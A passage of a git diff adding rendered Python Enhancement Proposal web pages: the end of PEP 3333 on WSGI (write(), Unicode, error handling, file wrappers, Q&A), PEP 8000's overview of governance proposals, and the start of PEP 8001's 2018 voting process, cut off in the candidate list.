Unfortunately, such APIs cannot be implemented in terms of +WSGI’s “iterable” application return value, unless threads +or other special mechanisms are used.

+

Therefore, to allow these frameworks to continue using an +imperative API, WSGI includes a special write() callable, +returned by the start_response callable.

+

New WSGI applications and frameworks should not use the +write() callable if it is possible to avoid doing so. The +write() callable is strictly a hack to support imperative +streaming APIs. In general, applications should produce their +output via their returned iterable, as this makes it possible +for web servers to interleave other tasks in the same Python thread, +potentially providing better throughput for the server as a whole.

+

The write() callable is returned by the start_response() +callable, and it accepts a single parameter: a bytestring to be +written as part of the HTTP response body, that is treated exactly +as though it had been yielded by the output iterable. In other +words, before write() returns, it must guarantee that the +passed-in bytestring was either completely sent to the client, or +that it is buffered for transmission while the application +proceeds onward.

+

An application must return an iterable object, even if it +uses write() to produce all or part of its response body. +The returned iterable may be empty (i.e. yield no non-empty +bytestrings), but if it does yield non-empty bytestrings, that output +must be treated normally by the server or gateway (i.e., it must be +sent or queued immediately). Applications must not invoke +write() from within their return iterable, and therefore any +bytestrings yielded by the iterable are transmitted after all bytestrings +passed to write() have been sent to the client.

+
+
+
+

Unicode Issues

+

HTTP does not directly support Unicode, and neither does this +interface. All encoding/decoding must be handled by the application; +all strings passed to or from the server must be of type str or +bytes, never unicode. The result of using a unicode +object where a string object is required, is undefined.

+

Note also that strings passed to start_response() as a status or +as response headers must follow RFC 2616 with respect to encoding. +That is, they must either be ISO-8859-1 characters, or use RFC 2047 +MIME encoding.

+

On Python platforms where the str or StringType type is in +fact Unicode-based (e.g. Jython, IronPython, Python 3, etc.), all +“strings” referred to in this specification must contain only +code points representable in ISO-8859-1 encoding (\u0000 through +\u00FF, inclusive). It is a fatal error for an application to +supply strings containing any other Unicode character or code point. +Similarly, servers and gateways must not supply +strings to an application containing any other Unicode characters.

+

Again, all objects referred to in this specification as “strings” +must be of type str or StringType, and must not be +of type unicode or UnicodeType. And, even if a given platform +allows for more than 8 bits per character in str/StringType +objects, only the lower 8 bits may be used, for any value referred +to in this specification as a “string”.

+

For values referred to in this specification as “bytestrings” +(i.e., values read from wsgi.input, passed to write() +or yielded by the application), the value must be of type +bytes under Python 3, and str in earlier versions of +Python.

+
+
+

Error Handling

+

In general, applications should try to trap their own, internal +errors, and display a helpful message in the browser. (It is up +to the application to decide what “helpful” means in this context.)

+

However, to display such a message, the application must not have +actually sent any data to the browser yet, or else it risks corrupting +the response. WSGI therefore provides a mechanism to either allow the +application to send its error message, or be automatically aborted: +the exc_info argument to start_response. Here is an example +of its use:

+
try:
+    # regular application code here
+    status = "200 Froody"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers)
+    return ["normal body goes here"]
+except:
+    # XXX should trap runtime issues like MemoryError, KeyboardInterrupt
+    #     in a separate handler before this bare 'except:'...
+    status = "500 Oops"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers, sys.exc_info())
+    return ["error body goes here"]
+
+
+

If no output has been written when an exception occurs, the call to +start_response will return normally, and the application will +return an error body to be sent to the browser. However, if any output +has already been sent to the browser, start_response will reraise +the provided exception. This exception should not be trapped by +the application, and so the application will abort. The server or +gateway can then trap this (fatal) exception and abort the response.

+

Servers should trap and log any exception that aborts an +application or the iteration of its return value. If a partial +response has already been written to the browser when an application +error occurs, the server or gateway may attempt to add an error +message to the output, if the already-sent headers indicate a +text/* content type that the server knows how to modify cleanly.

+

Some middleware may wish to provide additional exception handling +services, or intercept and replace application error messages. In +such cases, middleware may choose to not re-raise the exc_info +supplied to start_response, but instead raise a middleware-specific +exception, or simply return without an exception after storing the +supplied arguments. This will then cause the application to return +its error body iterable (or invoke write()), allowing the middleware +to capture and modify the error output. These techniques will work as +long as application authors:

+
    +
  1. Always provide exc_info when beginning an error response
  2. +
  3. Never trap errors raised by start_response when exc_info is +being provided
  4. +
+
+
+

HTTP 1.1 Expect/Continue

+

Servers and gateways that implement HTTP 1.1 must provide +transparent support for HTTP 1.1’s “expect/continue” mechanism. This +may be done in any of several ways:

+
    +
  1. Respond to requests containing an Expect: 100-continue request +with an immediate “100 Continue” response, and proceed normally.
  2. +
  3. Proceed with the request normally, but provide the application +with a wsgi.input stream that will send the “100 Continue” +response if/when the application first attempts to read from the +input stream. The read request must then remain blocked until the +client responds.
  4. +
  5. Wait until the client decides that the server does not support +expect/continue, and sends the request body on its own. (This +is suboptimal, and is not recommended.)
  6. +
+

Note that these behavior restrictions do not apply for HTTP 1.0 +requests, or for requests that are not directed to an application +object. For more information on HTTP 1.1 Expect/Continue, see +RFC 2616, sections 8.2.3 and 10.1.1.

+
+
+

Other HTTP Features

+

In general, servers and gateways should “play dumb” and allow the +application complete control over its output. They should only make +changes that do not alter the effective semantics of the application’s +response. It is always possible for the application developer to add +middleware components to supply additional features, so server/gateway +developers should be conservative in their implementation. In a sense, +a server should consider itself to be like an HTTP “gateway server”, +with the application being an HTTP “origin server”. (See RFC 2616, +section 1.3, for the definition of these terms.)

+

However, because WSGI servers and applications do not communicate via +HTTP, what RFC 2616 calls “hop-by-hop” headers do not apply to WSGI +internal communications. WSGI applications must not generate any +“hop-by-hop” headers, +attempt to use HTTP features that would +require them to generate such headers, or rely on the content of +any incoming “hop-by-hop” headers in the environ dictionary. +WSGI servers must handle any supported inbound “hop-by-hop” headers +on their own, such as by decoding any inbound Transfer-Encoding, +including chunked encoding if applicable.

+

Applying these principles to a variety of HTTP features, it should be +clear that a server may handle cache validation via the +If-None-Match and If-Modified-Since request headers and the +Last-Modified and ETag response headers. However, it is +not required to do this, and the application should perform its +own cache validation if it wants to support that feature, since +the server/gateway is not required to do such validation.

+

Similarly, a server may re-encode or transport-encode an +application’s response, but the application should use a +suitable content encoding on its own, and must not apply a +transport encoding. A server may transmit byte ranges of the +application’s response if requested by the client, and the +application doesn’t natively support byte ranges. Again, however, +the application should perform this function on its own if desired.

+

Note that these restrictions on applications do not necessarily mean +that every application must reimplement every HTTP feature; many HTTP +features can be partially or fully implemented by middleware +components, thus freeing both server and application authors from +implementing the same features over and over again.

+
+
+

Thread Support

+

Thread support, or lack thereof, is also server-dependent. +Servers that can run multiple requests in parallel, should also +provide the option of running an application in a single-threaded +fashion, so that applications or frameworks that are not thread-safe +may still be used with that server.

+
+
+
+

Implementation/Application Notes

+
+

Server Extension APIs

+

Some server authors may wish to expose more advanced APIs, that +application or framework authors can use for specialized purposes. +For example, a gateway based on mod_python might wish to expose +part of the Apache API as a WSGI extension.

+

In the simplest case, this requires nothing more than defining an +environ variable, such as mod_python.some_api. But, in many +cases, the possible presence of middleware can make this difficult. +For example, an API that offers access to the same HTTP headers that +are found in environ variables, might return different data if +environ has been modified by middleware.

+

In general, any extension API that duplicates, supplants, or bypasses +some portion of WSGI functionality runs the risk of being incompatible +with middleware components. Server/gateway developers should not +assume that nobody will use middleware, because some framework +developers specifically intend to organize or reorganize their +frameworks to function almost entirely as middleware of various kinds.

+

So, to provide maximum compatibility, servers and gateways that +provide extension APIs that replace some WSGI functionality, must +design those APIs so that they are invoked using the portion of the +API that they replace. For example, an extension API to access HTTP +request headers must require the application to pass in its current +environ, so that the server/gateway may verify that HTTP headers +accessible via the API have not been altered by middleware. If the +extension API cannot guarantee that it will always agree with +environ about the contents of HTTP headers, it must refuse service +to the application, e.g. by raising an error, returning None +instead of a header collection, or whatever is appropriate to the API.

+

Similarly, if an extension API provides an alternate means of writing +response data or headers, it should require the start_response +callable to be passed in, before the application can obtain the +extended service. If the object passed in is not the same one that +the server/gateway originally supplied to the application, it cannot +guarantee correct operation and must refuse to provide the extended +service to the application.

+

These guidelines also apply to middleware that adds information such +as parsed cookies, form variables, sessions, and the like to +environ. Specifically, such middleware should provide these +features as functions which operate on environ, rather than simply +stuffing values into environ. This helps ensure that information +is calculated from environ after any middleware has done any URL +rewrites or other environ modifications.

+

It is very important that these “safe extension” rules be followed by +both server/gateway and middleware developers, in order to avoid a +future in which middleware developers are forced to delete any and all +extension APIs from environ to ensure that their mediation isn’t +being bypassed by applications using those extensions!

+
+
+

Application Configuration

+

This specification does not define how a server selects or obtains an +application to invoke. These and other configuration options are +highly server-specific matters. It is expected that server/gateway +authors will document how to configure the server to execute a +particular application object, and with what options (such as +threading options).

+

Framework authors, on the other hand, should document how to create an +application object that wraps their framework’s functionality. The +user, who has chosen both the server and the application framework, +must connect the two together. However, since both the framework and +the server now have a common interface, this should be merely a +mechanical matter, rather than a significant engineering effort for +each new server/framework pair.

+

Finally, some applications, frameworks, and middleware may wish to +use the environ dictionary to receive simple string configuration +options. Servers and gateways should support this by allowing +an application’s deployer to specify name-value pairs to be placed in +environ. In the simplest case, this support can consist merely of +copying all operating system-supplied environment variables from +os.environ into the environ dictionary, since the deployer in +principle can configure these externally to the server, or in the +CGI case they may be able to be set via the server’s configuration +files.

+

Applications should try to keep such required variables to a +minimum, since not all servers will support easy configuration of +them. Of course, even in the worst case, persons deploying an +application can create a script to supply the necessary configuration +values:

+
from the_app import application
+
+def new_app(environ, start_response):
+    environ['the_app.configval1'] = 'something'
+    return application(environ, start_response)
+
+
+

But, most existing applications and frameworks will probably only need +a single configuration value from environ, to indicate the location +of their application or framework-specific configuration file(s). (Of +course, applications should cache such configuration, to avoid having +to re-read it upon each invocation.)

+
+
+

URL Reconstruction

+

If an application wishes to reconstruct a request’s complete URL, it +may do so using the following algorithm, contributed by Ian Bicking:

+
from urllib.parse import quote
+url = environ['wsgi.url_scheme']+'://'
+
+if environ.get('HTTP_HOST'):
+    url += environ['HTTP_HOST']
+else:
+    url += environ['SERVER_NAME']
+
+    if environ['wsgi.url_scheme'] == 'https':
+        if environ['SERVER_PORT'] != '443':
+           url += ':' + environ['SERVER_PORT']
+    else:
+        if environ['SERVER_PORT'] != '80':
+           url += ':' + environ['SERVER_PORT']
+
+url += quote(environ.get('SCRIPT_NAME', ''))
+url += quote(environ.get('PATH_INFO', ''))
+if environ.get('QUERY_STRING'):
+    url += '?' + environ['QUERY_STRING']
+
+
+

Note that such a reconstructed URL may not be precisely the same URI +as requested by the client. Server rewrite rules, for example, may +have modified the client’s originally requested URL to place it in a +canonical form.

+
+
+

Supporting Older (<2.2) Versions of Python

+

Some servers, gateways, or applications may wish to support older +(<2.2) versions of Python. This is especially important if Jython +is a target platform, since as of this writing a production-ready +version of Jython 2.2 is not yet available.

+

For servers and gateways, this is relatively straightforward: +servers and gateways targeting pre-2.2 versions of Python must +simply restrict themselves to using only a standard “for” loop to +iterate over any iterable returned by an application. This is the +only way to ensure source-level compatibility with both the pre-2.2 +iterator protocol (discussed further below) and “today’s” iterator +protocol (see PEP 234).

+

(Note that this technique necessarily applies only to servers, +gateways, or middleware that are written in Python. Discussion of +how to use iterator protocol(s) correctly from other languages is +outside the scope of this PEP.)

+

For applications, supporting pre-2.2 versions of Python is slightly +more complex:

+
    +
  • You may not return a file object and expect it to work as an iterable, +since before Python 2.2, files were not iterable. (In general, you +shouldn’t do this anyway, because it will perform quite poorly most +of the time!) Use wsgi.file_wrapper or an application-specific +file wrapper class. (See Optional Platform-Specific File Handling +for more on wsgi.file_wrapper, and an example class you can use +to wrap a file as an iterable.)
  • +
  • If you return a custom iterable, it must implement the pre-2.2 +iterator protocol. That is, provide a __getitem__ method that +accepts an integer key, and raises IndexError when exhausted. +(Note that built-in sequence types are also acceptable, since they +also implement this protocol.)
  • +
+

Finally, middleware that wishes to support pre-2.2 versions of Python, +and iterates over application return values or itself returns an +iterable (or both), must follow the appropriate recommendations above.

+

(Note: It should go without saying that to support pre-2.2 versions +of Python, any server, gateway, application, or middleware must also +use only language features available in the target version, use +1 and 0 instead of True and False, etc.)

+
+
+

Optional Platform-Specific File Handling

+

Some operating environments provide special high-performance +file-transmission facilities, such as the Unix sendfile() call. +Servers and gateways may expose this functionality via an optional +wsgi.file_wrapper key in the environ. An application +may use this “file wrapper” to convert a file or file-like object +into an iterable that it then returns, e.g.:

+
if 'wsgi.file_wrapper' in environ:
+    return environ['wsgi.file_wrapper'](filelike, block_size)
+else:
+    return iter(lambda: filelike.read(block_size), '')
+
+
+

If the server or gateway supplies wsgi.file_wrapper, it must be +a callable that accepts one required positional parameter, and one +optional positional parameter. The first parameter is the file-like +object to be sent, and the second parameter is an optional block +size “suggestion” (which the server/gateway need not use). The +callable must return an iterable object, and must not perform +any data transmission until and unless the server/gateway actually +receives the iterable as a return value from the application. +(To do otherwise would prevent middleware from being able to interpret +or override the response data.)

+

To be considered “file-like”, the object supplied by the application +must have a read() method that takes an optional size argument. +It may have a close() method, and if so, the iterable returned +by wsgi.file_wrapper must have a close() method that +invokes the original file-like object’s close() method. If the +“file-like” object has any other methods or attributes with names +matching those of Python built-in file objects (e.g. fileno()), +the wsgi.file_wrapper may assume that these methods or +attributes have the same semantics as those of a built-in file object.

+

The actual implementation of any platform-specific file handling +must occur after the application returns, and the server or +gateway checks to see if a wrapper object was returned. (Again, +because of the presence of middleware, error handlers, and the like, +it is not guaranteed that any wrapper created will actually be used.)

+

Apart from the handling of close(), the semantics of returning a +file wrapper from the application should be the same as if the +application had returned iter(filelike.read, ''). In other words, +transmission should begin at the current position within the “file” +at the time that transmission begins, and continue until the end is +reached, or until Content-Length bytes have been written. (If +the application doesn’t supply a Content-Length, the server may +generate one from the file using its knowledge of the underlying file +implementation.)

+

Of course, platform-specific file transmission APIs don’t usually +accept arbitrary “file-like” objects. Therefore, a +wsgi.file_wrapper has to introspect the supplied object for +things such as a fileno() (Unix-like OSes) or a +java.nio.FileChannel (under Jython) in order to determine if +the file-like object is suitable for use with the platform-specific +API it supports.

+

Note that even if the object is not suitable for the platform API, +the wsgi.file_wrapper must still return an iterable that wraps +read() and close(), so that applications using file wrappers +are portable across platforms. Here’s a simple platform-agnostic +file wrapper class, suitable for old (pre 2.2) and new Pythons alike:

+
class FileWrapper:
+
+    def __init__(self, filelike, blksize=8192):
+        self.filelike = filelike
+        self.blksize = blksize
+        if hasattr(filelike, 'close'):
+            self.close = filelike.close
+
+    def __getitem__(self, key):
+        data = self.filelike.read(self.blksize)
+        if data:
+            return data
+        raise IndexError
+
+
+

and here is a snippet from a server/gateway that uses it to provide +access to a platform-specific API:

+
environ['wsgi.file_wrapper'] = FileWrapper
+result = application(environ, start_response)
+
+try:
+    if isinstance(result, FileWrapper):
+        # check if result.filelike is usable w/platform-specific
+        # API, and if so, use that API to transmit the result.
+        # If not, fall through to normal iterable handling
+        # loop below.
+
+    for data in result:
+        # etc.
+
+finally:
+    if hasattr(result, 'close'):
+        result.close()
+
+
+
+
+
+

Questions and Answers

+
    +
  1. Why must environ be a dictionary? What’s wrong with using a +subclass?

    The rationale for requiring a dictionary is to maximize portability +between servers. The alternative would be to define some subset of +a dictionary’s methods as being the standard and portable +interface. In practice, however, most servers will probably find a +dictionary adequate to their needs, and thus framework authors will +come to expect the full set of dictionary features to be available, +since they will be there more often than not. But, if some server +chooses not to use a dictionary, then there will be +interoperability problems despite that server’s “conformance” to +spec. Therefore, making a dictionary mandatory simplifies the +specification and guarantees interoperability.

    +

    Note that this does not prevent server or framework developers from +offering specialized services as custom variables inside the +environ dictionary. This is the recommended approach for +offering any such value-added services.

    +
  2. +
  3. Why can you call write() and yield bytestrings/return an +iterable? Shouldn’t we pick just one way?

    If we supported only the iteration approach, then current +frameworks that assume the availability of “push” suffer. But, if +we only support pushing via write(), then server performance +suffers for transmission of e.g. large files (if a worker thread +can’t begin work on a new request until all of the output has been +sent). Thus, this compromise allows an application framework to +support both approaches, as appropriate, but with only a little +more burden to the server implementor than a push-only approach +would require.

    +
  4. +
  5. What’s the close() for?

    When writes are done during the execution of an application +object, the application can ensure that resources are released +using a try/finally block. But, if the application returns an +iterable, any resources used will not be released until the +iterable is garbage collected. The close() idiom allows an +application to release critical resources at the end of a request, +and it’s forward-compatible with the support for try/finally in +generators that’s proposed by PEP 325.

    +
  6. +
  7. Why is this interface so low-level? I want feature X! (e.g. +cookies, sessions, persistence, …)

    This isn’t Yet Another Python Web Framework. It’s just a way for +frameworks to talk to web servers, and vice versa. If you want +these features, you need to pick a web framework that provides the +features you want. And if that framework lets you create a WSGI +application, you should be able to run it in most WSGI-supporting +servers. Also, some WSGI servers may offer additional services via +objects provided in their environ dictionary; see the +applicable server documentation for details. (Of course, +applications that use such extensions will not be portable to other +WSGI-based servers.)

    +
  8. +
  9. Why use CGI variables instead of good old HTTP headers? And why +mix them in with WSGI-defined variables?

    Many existing web frameworks are built heavily upon the CGI spec, +and existing web servers know how to generate CGI variables. In +contrast, alternative ways of representing inbound HTTP information +are fragmented and lack market share. Thus, using the CGI +“standard” seems like a good way to leverage existing +implementations. As for mixing them with WSGI variables, +separating them would just require two dictionary arguments to be +passed around, while providing no real benefits.

    +
  10. +
  11. What about the status string? Can’t we just use the number, +passing in 200 instead of "200 OK"?

    Doing this would complicate the server or gateway, by requiring +them to have a table of numeric statuses and corresponding +messages. By contrast, it is easy for an application or framework +author to type the extra text to go with the specific response code +they are using, and existing frameworks often already have a table +containing the needed messages. So, on balance it seems better to +make the application/framework responsible, rather than the server +or gateway.

    +
  12. +
  13. Why is wsgi.run_once not guaranteed to run the app only once?

    Because it’s merely a suggestion to the application that it should +“rig for infrequent running”. This is intended for application +frameworks that have multiple modes of operation for caching, +sessions, and so forth. In a “multiple run” mode, such frameworks +may preload caches, and may not write e.g. logs or session data to +disk after each request. In “single run” mode, such frameworks +avoid preloading and flush all necessary writes after each request.

    +

    However, in order to test an application or framework to verify +correct operation in the latter mode, it may be necessary (or at +least expedient) to invoke it more than once. Therefore, an +application should not assume that it will definitely not be run +again, just because it is called with wsgi.run_once set to +True.

    +
  14. +
  15. Feature X (dictionaries, callables, etc.) are ugly for use in +application code; why don’t we use objects instead?

    All of these implementation choices of WSGI are specifically +intended to decouple features from one another; recombining these +features into encapsulated objects makes it somewhat harder to +write servers or gateways, and an order of magnitude harder to +write middleware that replaces or modifies only small portions of +the overall functionality.

    +

    In essence, middleware wants to have a “Chain of Responsibility” +pattern, whereby it can act as a “handler” for some functions, +while allowing others to remain unchanged. This is difficult to do +with ordinary Python objects, if the interface is to remain +extensible. For example, one must use __getattr__ or +__getattribute__ overrides, to ensure that extensions (such as +attributes defined by future WSGI versions) are passed through.

    +

    This type of code is notoriously difficult to get 100% correct, and +few people will want to write it themselves. They will therefore +copy other people’s implementations, but fail to update them when +the person they copied from corrects yet another corner case.

    +

    Further, this necessary boilerplate would be pure excise, a +developer tax paid by middleware developers to support a slightly +prettier API for application framework developers. But, +application framework developers will typically only be updating +one framework to support WSGI, and in a very limited part of +their framework as a whole. It will likely be their first (and +maybe their only) WSGI implementation, and thus they will likely +implement with this specification ready to hand. Thus, the effort +of making the API “prettier” with object attributes and suchlike +would likely be wasted for this audience.

    +

    We encourage those who want a prettier (or otherwise improved) WSGI +interface for use in direct web application programming (as opposed +to web framework development) to develop APIs or frameworks that +wrap WSGI for convenient use by application developers. In this +way, WSGI can remain conveniently low-level for server and +middleware authors, while not being “ugly” for application +developers.

    +
  16. +
+
+
+

Proposed/Under Discussion

+

These items are currently being discussed on the Web-SIG and elsewhere, +or are on the PEP author’s “to-do” list:

+
    +
  • Should wsgi.input be an iterator instead of a file? This would +help for asynchronous applications and chunked-encoding input +streams.
  • +
  • Optional extensions are being discussed for pausing iteration of an +application’s output until input is available or until a callback +occurs.
  • +
  • Add a section about synchronous vs. asynchronous apps and servers, +the relevant threading models, and issues/design goals in these +areas.
  • +
+
+
+

Acknowledgements

+

Thanks go to the many folks on the Web-SIG mailing list whose +thoughtful feedback made this revised draft possible. Especially:

+
    +
  • Gregory “Grisha” Trubetskoy, author of mod_python, who beat up +on the first draft as not offering any advantages over “plain old +CGI”, thus encouraging me to look for a better approach.
  • +
  • Ian Bicking, who helped nag me into properly specifying the +multithreading and multiprocess options, as well as badgering me to +provide a mechanism for servers to supply custom extension data to +an application.
  • +
  • Tony Lownds, who came up with the concept of a start_response +function that took the status and headers, returning a write +function. His input also guided the design of the exception handling +facilities, especially in the area of allowing for middleware that +overrides application error messages.
  • +
  • Alan Kennedy, whose courageous attempts to implement WSGI-on-Jython +(well before the spec was finalized) helped to shape the “supporting +older versions of Python” section, as well as the optional +wsgi.file_wrapper facility, and some of the early bytes/unicode +decisions.
  • +
  • Mark Nottingham, who reviewed the spec extensively for issues with +HTTP RFC compliance, especially with regard to HTTP/1.1 features that +I didn’t even know existed until he pointed them out.
  • +
  • Graham Dumpleton, who worked tirelessly (even in the face of my laziness +and stupidity) to get some sort of Python 3 version of WSGI out, who +proposed the “native strings” vs. “byte strings” concept, and thoughtfully +wrestled through a great many HTTP, wsgi.input, and other +amendments. Most, if not all, of the credit for this new PEP +belongs to him.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3333.rst

+

Last modified: 2023-10-23 19:28:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8000/index.html b/pep-8000/index.html new file mode 100644 index 00000000000..42b22bfc214 --- /dev/null +++ b/pep-8000/index.html @@ -0,0 +1,206 @@ + + + + + + + + PEP 8000 – Python Language Governance Proposal Overview | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8000 – Python Language Governance Proposal Overview

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP provides an overview of the selection process for a new model of +Python language governance in the wake of Guido’s retirement. +Once the governance model is selected, it will be codified in PEP 13.

+

Here is a list of PEPs related to the governance model selection process. +PEPs in the lower 8000s describe the general process for selecting a +governance model.

+
    +
  • PEP 8001 - Python Governance Voting Process

    This PEP describes how the vote for the new governance model will be +conducted. It outlines the voting method, timeline, criteria for +participation, and explicit list of eligible voters.

    +
  • +
  • PEP 8002 - Open Source Governance Survey

    Surveys will be conducted of governance models for similar open source and +free software projects, and summaries of these models will be outlined in +this PEP. These surveys will serve as useful barometers for how such +projects can be successfully governed, and may serve as inspiration for +Python’s own governance model. Python is unique, so it’s expected that it +will have its own spin on governance, rather than directly adopting any of +those surveyed.

    +
  • +
+

PEPs in the 801Xs describe the actual proposals for Python governance. It is +expected that these PEPs will cover the broad scope of governance, and that +differences in details (such as the size of a governing council) will be +covered in the same PEP, rather than in potentially vote-splitting individual +PEPs.

+
    +
  • PEP 8010 - The Technical Leader Governance Model

    This PEP proposes a continuation of the singular technical project +leader model. Also within scope is whether an advisory council aids +or supports the BDFL. This PEP does not name either the next +BDFL, nor members of such an advisory council. For that, see PEP +13.

    +
  • +
  • PEP 8011 - Python Governance Model Lead by Trio of Pythonistas

    This PEP describes a new model of Python governance lead by a Trio of Pythonistas +(TOP). It describes the role and responsibilities of the Trio. +This PEP does not name members of the Trio. For that, see PEP 13.

    +
  • +
  • PEP 8012 - The Community Governance Model

    This is a placeholder PEP for a new model of Python governance based on +consensus and voting, without the role of a centralized singular leader or a +governing council. It describes how, when, and why votes are conducted for +decisions affecting the Python language. It also describes the criteria for +voting eligibility.

    +
  • +
  • PEP 8013 - The External Governance Model

    This PEP describes a new model of Python governance based on an external +council who are responsible for ensuring good process. Elected by the core +development team, this council may reject proposals that are not +sufficiently detailed, do not consider all affected users, or are not +appropriate for the upcoming release. This PEP does not name members of +such a council. For that, see PEP 13.

    +
  • +
  • PEP 8014 - The Commons Governance Model

    This PEP describes a new model of Python governance based on a council of +elders who are responsible for ensuring a PEP is supported by a sufficient +majority of the Python community before being accepted. Unlike some of the +other governance PEPs it explicitly does not specify who has voting +rights and what a majority vote consists of. In stead this is determined +by the council of elders on a case-by-case basis.

    +
  • +
  • PEP 8015 - Organization of the Python community

    This PEP formalizes the current organization of the Python community +and proposes 3 main changes: formalize the existing concept of +“Python teams”; give more autonomy to Python teams; replace the BDFL +(Guido van Rossum) with a new “Python board” of 3 members which has +limited roles, mostly decide how a PEP is approved (or rejected).

    +
  • +
  • PEP 8016 - The Steering Council Model

    This PEP proposes a model of Python governance based around a +steering council. The council has broad authority, which they seek +to exercise as rarely as possible; instead, they use this power to +establish standard processes, like those proposed in the other +801x-series PEPs. This follows the general philosophy that it’s +better to split up large changes into a series of small changes that +can be reviewed independently: instead of trying to do everything in +one PEP, we focus on providing a minimal-but-solid foundation for +further governance decisions.

    +
  • +
+

Additional governance models may be added before the final selection.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8000.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8001/index.html b/pep-8001/index.html new file mode 100644 index 00000000000..9bdfd2355d0 --- /dev/null +++ b/pep-8001/index.html @@ -0,0 +1,458 @@ + + + + + + + + PEP 8001 – Python Governance Voting Process | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8001 – Python Governance Voting Process

+
+
Author:
+
Brett Cannon <brett at python.org>, +Christian Heimes <christian at python.org>, +Donald Stufft <donald at stufft.io>, +Eric Snow <ericsnowcurrently at gmail.com>, +Gregory P. Smith <greg at krypto.org>, +Łukasz Langa <lukasz at python.org>, +Mariatta <mariatta at python.org>, +Nathaniel J. Smith <njs at pobox.com>, +Pablo Galindo Salgado <pablogsal at python.org>, +Raymond Hettinger <python at rcn.com>, +Tal Einat <tal at python.org>, +Tim Peters <tim.peters at gmail.com>, +Zachary Ware <zach at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the process for how the new model of Python governance is +selected, in the wake of Guido’s retirement. +Once the model is chosen by the procedures outlined here, it will be codified +in PEP 13.

+
+
+

Motivation and Rationale

+

Guido’s stepping down from the BDFL role left us with a meta-problem of +having to choose how we will choose how the Python project should be +governed from now on.

+

This document presents a concrete proposal how this choice can be made. +It summarizes discussion and conclusions of the proceedings of a working +group at the core sprint in Redmond in September 2018 (names of all +attendees are listed as authors). This PEP also summarizes a +subsequent thread +that took place on discuss.python.org .

+

The governance situation should be resolved in a timely fashion. +Ideally that should happen by the end of the 2018 which unblocks +substantial improvements to be merged in time for Python 3.8. At the +latest, the governance situation needs to be resolved by PyCon US 2019 to +avoid a PR crisis.

+
+
+

Implementation

+
+

What are we voting for?

+

We are voting to choose which governance PEP should be implemented by +the Python project. The list of candidate PEPs is listed in PEP 8000 +and consists of all PEPs numbered in the 801X range.

+

To ensure the vote is legitimate, the aforementioned PEPs must not be +modified during the voting period.

+
+
+

Who gets to vote?

+

Every CPython core developer is invited to vote. In the interest of +transparency and fairness, we are asking core developers to self-select +based on whether the governance situation will affect them directly. +In other words, we are recommending for inactive core developers who +intend to remain inactive to abstain from voting.

+
+
+

When is the vote?

+

November 16th, 2018 to November 30th, 2018 is the official governance +PEP review period. We discourage the PEP authors from making major +substantive changes during this period, although it is expected that +minor tweaks may occur, as the result of this discussion period.

+

The vote will happen in a 2-week-long window from December 1st, 2018 +to December 16th, 2018 +(Anywhere on Earth).

+
+
+

Where is the vote?

+

The vote will happen using a “private” poll on the +Condorcet Internet Voting Service. Every committer +will receive an email with a link allowing them to rank the PEPs in their order of +preference.

+

The election will be supervised by Ee Durbin, The PSF Director of Infrastructure.

+

The results of the election, including anonymized ballots, will be made public on +December 17th, after the election has closed.

+

The following settings will be used for the vote in the CIVS system:

+

Name of the poll: Python governance vote (December 2018)

+

Description of the poll:

+
This is the vote to choose how the CPython project will govern
+itself, now that Guido has announced his retirement as BDFL. For
+full details, see <a
+href="https://peps.python.org/pep-8001/">PEP
+8001</a>. Many discussions have occurred under <a
+href="https://discuss.python.org/tags/governance">the "governance"
+tag</a> on discuss.python.org.
+<p>
+All votes must be received <b>by the end of December 16th, 2018, <a
+href="https://en.wikipedia.org/wiki/Anywhere_on_Earth">Anywhere on
+Earth</a></b>. All CPython core developers are <a
+href="https://github.com/python/voters">eligible to vote</a>.
+It is asked that inactive core developers <i>who intend to remain
+inactive</i> abstain from voting.
+<p>
+<b>Note: You can only vote once, and all votes are final.</b> Once
+you click "Submit ranking", it's too late to change your mind.
+<p>
+All ballots will be published at the end of voting, but <b>without
+any names attached</b>. No-one associated with the Python project or
+the PSF will know how you voted, or even whether you voted.
+<p>
+If you have any questions, you can post in <a
+href="https://discuss.python.org/c/committers">the Committers
+topic</a>, on <a href="mailto:python-committers@python.org">the
+python-committers list</a>, or <a
+href="mailto:ee@python.org">contact the vote administrator
+directly</a>.
+<p>
+<h1>Options</h1>
+<p>
+We're selecting between seven PEPs, each proposing a different
+governance model.
+<p>
+The options below include links to the text of each PEP, as well
+as their complete change history. The text of these PEPs was
+frozen on December 1, when the vote started. But if you looked at
+the PEPs before that, they might have changed. Please take the
+time to check the current text of the PEPs if you read an older
+draft.
+<p>
+A "Further discussion" option is also included. It represents the
+option of not making a choice at all at this time, and continuing
+the discussion instead. Including this option lets us demonstrate
+the core team's readiness to move forward.
+<p>
+If you think a proposal is a particularly bad idea, you can
+express that by ranking it below "Further discussion". If you
+think all of the proposals are better than further discussion,
+then you should rank "Further discussion" last.
+
+
+

Candidates (note: linebreaks are significant here):

+
<a href="https://peps.python.org/pep-8010/">PEP 8010: The Technical Leader Governance Model</a> (Warsaw) (<a href="https://github.com/python/peps/commits/main/pep-8010.rst">changelog</a>)
